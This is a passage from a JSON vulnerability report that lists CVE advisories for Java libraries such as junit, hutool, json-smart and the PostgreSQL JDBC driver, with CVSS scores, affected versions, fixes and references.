ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"]}],"title":"CVE-2022-41854/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-15250"]}],"cve":"CVE-2020-15250","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2020-10-12T17:33:00","ids":[{"system_name":"CVE Record","text":"CVE-2020-15250"},{"system_name":"GitHub Advisory","text":"GHSA-269g-pwp5-87pp"},{"system_name":"Junit Advisory","text":"TemporaryFolder"},{"system_name":"Oracle Advisory","text":"cpuapr2022"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Permission Assignment for Critical Resource","title":"Additional CWE: 732"},{"category":"description","details":"Vulnerability Description","text":"TemporaryFolder on unix-like systems does not limit access to created files"},{"category":"details","details":"Vulnerability Details","text":"# TemporaryFolder on unix-like systems does not limit access to created files ### Vulnerability  The JUnit4 test rule [TemporaryFolder](https://junit.org/junit4/javadoc/4.13/org/junit/rules/TemporaryFolder.html) contains a local information disclosure vulnerability.  Example of vulnerable code: ```java public static class HasTempFolder {   @Rule   public TemporaryFolder folder = new TemporaryFolder();    @Test   public void testUsingTempFolder() throws IOException {     folder.getRoot(); // Previous file permissions: `drwxr-xr-x`; After fix:`drwx------`     File createdFile= folder.newFile(\"myfile.txt\"); // unchanged/irrelevant file permissions     File createdFolder= folder.newFolder(\"subfolder\"); // unchanged/irrelevant file permissions     // ...   } } ```  ### Impact  On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system.  This vulnerability **does not** allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability.  When analyzing the impact of this vulnerability, here are the important questions to ask:  1. Do the JUnit tests write sensitive information, like API keys or passwords, into the temporary folder?   - If yes, this vulnerability impacts you, but only if you also answer 'yes' to question 2.   - If no, this vulnerability does not impact you. 2. Do the JUnit tests ever execute in an environment where the OS has other untrusted users.    _This may apply in CI/CD environments but normally won't be 'yes' for personal developer machines._   - If yes, and you answered 'yes' to question 1, this vulnerability impacts you.   - If no, this vulnerability does not impact you.  ### Patches  Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using.  - Java 1.7 and higher users: this vulnerability is fixed in 4.13.1.  - Java 1.6 and lower users: **no patch is available, you must use the workaround below.**  ### Workarounds  If you are unable to patch, or are stuck running on Java 1.6, specifying the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability.  ### References - [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/200.html) - Fix commit https://github.com/junit-team/junit4/commit/610155b8c22138329f0723eec22521627dbc52ae  #### Similar Vulnerabilities  - Google Guava - https://github.com/google/guava/issues/4011  - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945  - JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824  ### For more information If you have any questions or comments about this advisory, please pen an issue in [junit-team/junit4](https://github.com/junit-team/junit4/issues)."}],"product_status":{"known_affected":["junit/junit@vers:maven/>=4.7|<4.13.1"],"known_not_affected":["junit/junit@4.13.1"]},"references":[{"summary":"GitHub Advisory GHSA-269g-pwp5-87pp","url":"https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp"},{"summary":"Junit Advisory TemporaryFolder","url":"https://junit.org/junit4/javadoc/4.13/org/junit/rules/TemporaryFolder.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r01110833b63616ddbef59ae4e10c0fbd0060f0a51206defd4cb4d917@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r09cfbb5aedd76023691bbce9ca4ce2e16bb07dd37554a17efc19935d@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1209986f79359b518d09513ff05a88e5b3c398540e775edea76a4774@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r29d703d1986d9b871466ff24082a1828ac8ad27bb0965a93a383872e@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2b78f23bc2711a76a7fc73ad67b7fcd6817c5cfccefd6f30a4f54943@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r30f502d2f79e8d635361adb8108dcbb73095163fcbd776ee7984a094@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r500517c23200fb2fdb0b82770a62dd6c88b3521cfb01cfd0c76e3f8b@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5f8841507576f595bb783ccec6a7cb285ea90d4e6f5043eae0e61a41@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r687f489b10b0d14e46f626aa88476545e1a2600b24c4ebd3c0d2a10b@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r717877028482c55acf604d7a0106af4ca05da4208c708fb157b53672@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r742b44fd75215fc75963b8ecc22b2e4372e68d67d3d859d2b5e8743f@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8b02dc6f18df11ff39eedb3038f1e31e6f90a779b1959bae65107279@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r925eaae7dd8f77dd61eefc49c1fcf54bd9ecfe605486870d7b1e9390@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r934208a520b38f5cf0cae199b6b076bfe7d081809528b0eff2459e40@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r95f8ef60c4b3a5284b647bb3132cda08e6fadad888a66b84f49da0b0@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9710067c7096b83cb6ae8f53a2f6f94e9c042d1bf1d6929f8f2a2b7a@%3Ccommits.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra1bdb9efae84794e8ffa2f8474be8290ba57830eefe9714b95da714b@%3Cdev.pdfbox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raebf13f53cd5d23d990712e3d11c80da9a7bae94a6284050f148ed99@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2771949c676ca984e58a5cd5ca79c2634dee1945e0406e48e0f8457@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2ffe2993f4dccc48d832e1a0f1c419477781b6ea16e725ca2276dbb@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb33212dab7beccaf1ffef9b88610047c644f644c7a0ebdc44d77e381@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbaec90e699bc7c7bd9a053f76707a36fda48b6d558f31dc79147dbf9@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc49cf1547ef6cac1be4b3c92339b2cae0acacf5acaba13cfa429a872@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdbdd30510a7c4d0908fd22075c02b75bbc2e0d977ec22249ef3133cb@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rde385b8b53ed046600ef68dd6b4528dea7566aaddb02c3e702cc28bc@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rde8e70b95c992378e8570e4df400c6008a9839eabdfb8f800a3e5af6@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdef7d1380c86e7c0edf8a0f89a2a8db86fce5e363457d56b722691b4@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rea812d8612fdc46842a2a57248cad4b01ddfdb1e9b037c49e68fdbfb@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reb700e60b9642eafa4b7922bfee80796394135aa09c7a239ef9f7486@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf2ec93f4ca9a97d1958eb4a31b1830f723419ce9bf2018a6e5741d5b@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf6e5d894d4b03bef537c9d6641272e0197c047c0d1982b4e176d0353@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf797d119cc3f51a8d7c3c5cbe50cb4524c8487282b986edde83a9467@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/11/msg00003.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15250"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15250"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":4.4,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":4.4,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":4.4,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N","version":"3.1"},"products":["junit/junit@vers:maven/>=4.7|<4.13.1"]}],"title":"CVE-2020-15250/pkg:maven/junit/junit@4.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-24163"]}],"cve":"CVE-2023-24163","cwe":{"id":"89","name":"Improper Neutralization of Special Elements used in an SQL Command"},"discovery_date":"2023-01-31T18:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-24163"},{"system_name":"Gitee Advisory","text":"I6AJWJ"},{"system_name":"Gitee Advisory","text":"hutool"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Dromara hutool vulnerable to SQL Injection"},{"category":"details","details":"Vulnerability Details","text":"# Dromara hutool vulnerable to SQL Injection SQL Inection vulnerability in Dromara hutool v5.8.11 allows attacker to execute arbitrary code via the aviator template engine."}],"product_status":{"known_affected":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<5.8.21"],"known_not_affected":["cn.hutool/hutool-all@5.8.21"]},"references":[{"summary":"Gitee Advisory hutool","url":"https://gitee.com/dromara/hutool"},{"summary":"Gitee Advisory I6AJWJ","url":"https://gitee.com/dromara/hutool/issues/I6AJWJ#note_15801868"},{"summary":"Gitee Advisory I6AJWJ","url":"https://gitee.com/dromara/hutool/issues/I6AJWJ#note_20057806_link"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24163"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24163"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<5.8.21"]}],"title":"CVE-2023-24163/pkg:maven/cn.hutool/hutool-all@5.8.10?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-24162"]}],"cve":"CVE-2023-24162","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2023-01-31T18:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-24162"},{"system_name":"Gitee Advisory","text":"I6AEX2"},{"system_name":"Gitee Advisory","text":"hutool"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Dromara Hutool Deserialization of Untrusted Data vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Dromara Hutool Deserialization of Untrusted Data vulnerability Deserialization vulnerability in Dromara Hutool v5.8.11 allows attacker to execute arbitrary code via the XmlUtil.readObjectFromXml parameter."}],"product_status":{"known_affected":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<=5.8.11"]},"references":[{"summary":"Gitee Advisory hutool","url":"https://gitee.com/dromara/hutool"},{"summary":"Gitee Advisory I6AEX2","url":"https://gitee.com/dromara/hutool/issues/I6AEX2"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24162"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24162"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<=5.8.11"]}],"title":"CVE-2023-24162/pkg:maven/cn.hutool/hutool-all@5.8.10?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-51074"]}],"cve":"CVE-2023-51074","cwe":{"id":"787","name":"Out-of-bounds Write"},"discovery_date":"2023-12-27T21:31:01","ids":[{"system_name":"CVE Record","text":"CVE-2023-51074"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"json-path Out-of-bounds Write vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# json-path Out-of-bounds Write vulnerability json-path v2.8.0 was discovered to contain a stack overflow via the `Criteria.parse()` method."}],"product_status":{"known_affected":["com.jayway.jsonpath/json-path@vers:maven/>=2.2.0|<2.9.0"],"known_not_affected":["com.jayway.jsonpath/json-path@2.9.0"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-51074"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-51074"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","version":"3.1"},"products":["com.jayway.jsonpath/json-path@vers:maven/>=2.2.0|<2.9.0"]}],"title":"CVE-2023-51074/pkg:maven/com.jayway.jsonpath/json-path@2.2.0?type=jar"},{"cve":"CVE-2023-1370","cwe":{"id":"674","name":"Uncontrolled Recursion"},"discovery_date":"2023-03-23T20:32:03","ids":[{"system_name":"CVE Record","text":"CVE-2023-1370"},{"system_name":"GitHub Advisory","text":"GHSA-493p-pfq6-5258"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-NETMINIDEV-3369748"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"},{"system_name":"JFrog Advisory","text":"stack-exhaustion-in-json-smart-leads-to-denial-of-service-when-parsing-malformed-json-xray-427633"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"json-smart Uncontrolled Recursion vulnerabilty"},{"category":"details","details":"Vulnerability Details","text":"# json-smart Uncontrolled Recursion vulnerabilty ### Impact Affected versions of [net.minidev:json-smart](https://github.com/netplex/json-smart-v1) are vulnerable to Denial of Service (DoS) due to a StackOverflowError when parsing a deeply nested JSON array or object.  When reaching a ‘[‘ or ‘{‘ character in the JSON input, the code parses an array or an object respectively. It was discovered that the 3PP does not have any limit to the nesting of such arrays or objects. Since the parsing of nested arrays and objects is done recursively, nesting too many of them can cause stack exhaustion (stack overflow) and crash the software.  ### Patches This vulnerability was fixed in json-smart version 2.4.9, but the maintainer recommends upgrading to 2.4.10, due to a remaining bug.  ### Workarounds N/A  ### References - https://www.cve.org/CVERecord?id=CVE-2023-1370 - https://nvd.nist.gov/vuln/detail/CVE-2023-1370 - https://security.snyk.io/vuln/SNYK-JAVA-NETMINIDEV-3369748"}],"product_status":{"known_affected":["net.minidev/json-smart@vers:maven/>=1.0.6.3|<=2.4.8"],"known_not_affected":["net.minidev/json-smart@2.4.10"]},"references":[{"summary":"GitHub Advisory GHSA-493p-pfq6-5258","url":"https://github.com/oswaldobapvicjr/jsonmerge/security/advisories/GHSA-493p-pfq6-5258"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1370"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1370"},{"summary":"JFrog Advisory stack-exhaustion-in-json-smart-leads-to-denial-of-service-when-parsing-malformed-json-xray-427633","url":"https://research.jfrog.com/vulnerabilities/stack-exhaustion-in-json-smart-leads-to-denial-of-service-when-parsing-malformed-json-xray-427633"},{"summary":"NetApp Advisory ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"},{"summary":"Snyk Advisory SNYK-JAVA-NETMINIDEV-3369748","url":"https://security.snyk.io/vuln/SNYK-JAVA-NETMINIDEV-3369748"},{"summary":"Cve 2023","url":"https://www.cve.org/CVERecord?id=CVE-2023-1370"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["net.minidev/json-smart@vers:maven/>=1.0.6.3|<=2.4.8"]}],"title":"CVE-2023-1370/pkg:maven/net.minidev/json-smart@2.2.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-27568"]}],"cve":"CVE-2021-27568","cwe":{"id":"754","name":"Improper Check for Unusual or Exceptional Conditions"},"discovery_date":"2021-06-16T18:03:47","ids":[{"system_name":"CVE Record","text":"CVE-2021-27568"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Check for Unusual or Exceptional Conditions in json-smart"},{"category":"details","details":"Vulnerability Details","text":"# Improper Check for Unusual or Exceptional Conditions in json-smart An issue was discovered in netplex json-smart-v1 through 2015-10-23 and json-smart-v2 through 2.4. An exception is thrown from a function, but it is not caught, as demonstrated by NumberFormatException. When it is not caught, it may cause programs using the library to crash or expose sensitive information."}],"product_status":{"known_affected":["net.minidev/json-smart@vers:maven/>=2.0.0|<2.3.1"],"known_not_affected":["net.minidev/json-smart@2.3.1"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6287f5aa628c8d9af52b5401ec6cc51b6fc28ab20d318943453e396@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re237267da268c690df5e1c6ea6a38a7fc11617725e8049490f58a6fa@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf70210b4d63191c0bfb2a0d5745e104484e71703bf5ad9cb01c980c6@%3Ccommits.druid.apache.org%3E"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-27568"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-27568"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["net.minidev/json-smart@vers:maven/>=2.0.0|<2.3.1"]}],"title":"CVE-2021-27568/pkg:maven/net.minidev/json-smart@2.2.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-41946"]}],"cve":"CVE-2022-41946","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2022-11-23T22:17:25","ids":[{"system_name":"CVE Record","text":"CVE-2022-41946"},{"system_name":"GitHub Advisory","text":"GHSA-562r-vg33-8x8h"},{"system_name":"NetApp Advisory","text":"ntap-20240329-0003"}],"notes":[{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"category":"description","details":"Vulnerability Description","text":"TemporaryFolder on unix-like systems does not limit access to created files"},{"category":"details","details":"Vulnerability Details","text":"# TemporaryFolder on unix-like systems does not limit access to created files **Vulnerability**  `PreparedStatement.setText(int, InputStream)` and  `PreparedStatemet.setBytea(int, InputStream)`  will create a temporary file if the InputStream is larger than 51k    Example of vulnerable code:  ```java String s = \"some very large string greater than 51200 bytes\";  PreparedStatement.setInputStream(1, new ByteArrayInputStream(s.getBytes()) ); ``` This will create a temporary file which is readable by other users on Unix like systems, but not MacOS.  Impact On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system.  This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability.  When analyzing the impact of this vulnerability, here are the important questions to ask:  Is the driver running in an environment where the OS has other untrusted users. If yes, and you answered 'yes' to question 1, this vulnerability impacts you. If no, this vulnerability does not impact you. Patches Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using.  Java 1.8 and higher users: this vulnerability is fixed in 42.2.27, 42.3.8, 42.4.3, 42.5.1 Java 1.7 users: this vulnerability is fixed in 42.2.27.jre7 Java 1.6 and lower users: no patch is available; you must use the workaround below. Workarounds If you are unable to patch, or are stuck running on Java 1.6, specifying the java.io.tmpdir system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability.  References [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/200.html) Fix commit https://github.com/pgjdbc/pgjdbc/commit/9008dc9aade6dbfe4efafcd6872ebc55f4699cf5 Similar Vulnerabilities Google Guava - https://github.com/google/guava/issues/4011 Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945 JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824  ## Related CVE(s) BIT-postgresql-jdbc-driver-2022-41946, CVE-2022-41946"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.8"],"known_not_affected":["org.postgresql/postgresql@42.3.8"]},"references":[{"summary":"GitHub Advisory GHSA-562r-vg33-8x8h","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-562r-vg33-8x8h"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00003.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41946"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41946"},{"summary":"NetApp Advisory ntap-20240329-0003","url":"https://security.netapp.com/advisory/ntap-20240329-0003"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":4.7,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":4.7,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":4.7,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.8"]}],"title":"CVE-2022-41946/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-26520"]}],"cve":"CVE-2022-26520","discovery_date":"2022-03-11T00:02:02","ids":[{"system_name":"CVE Record","text":"CVE-2022-26520"},{"system_name":"GitHub Advisory","text":"GHSA-673j-qm5f-xpv8"},{"system_name":"Postgresql Advisory","text":"changelog"},{"system_name":"Debian Advisory","text":"dsa-5196"},{"system_name":"Postgresql Advisory","text":"tomcat"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Path traversal in 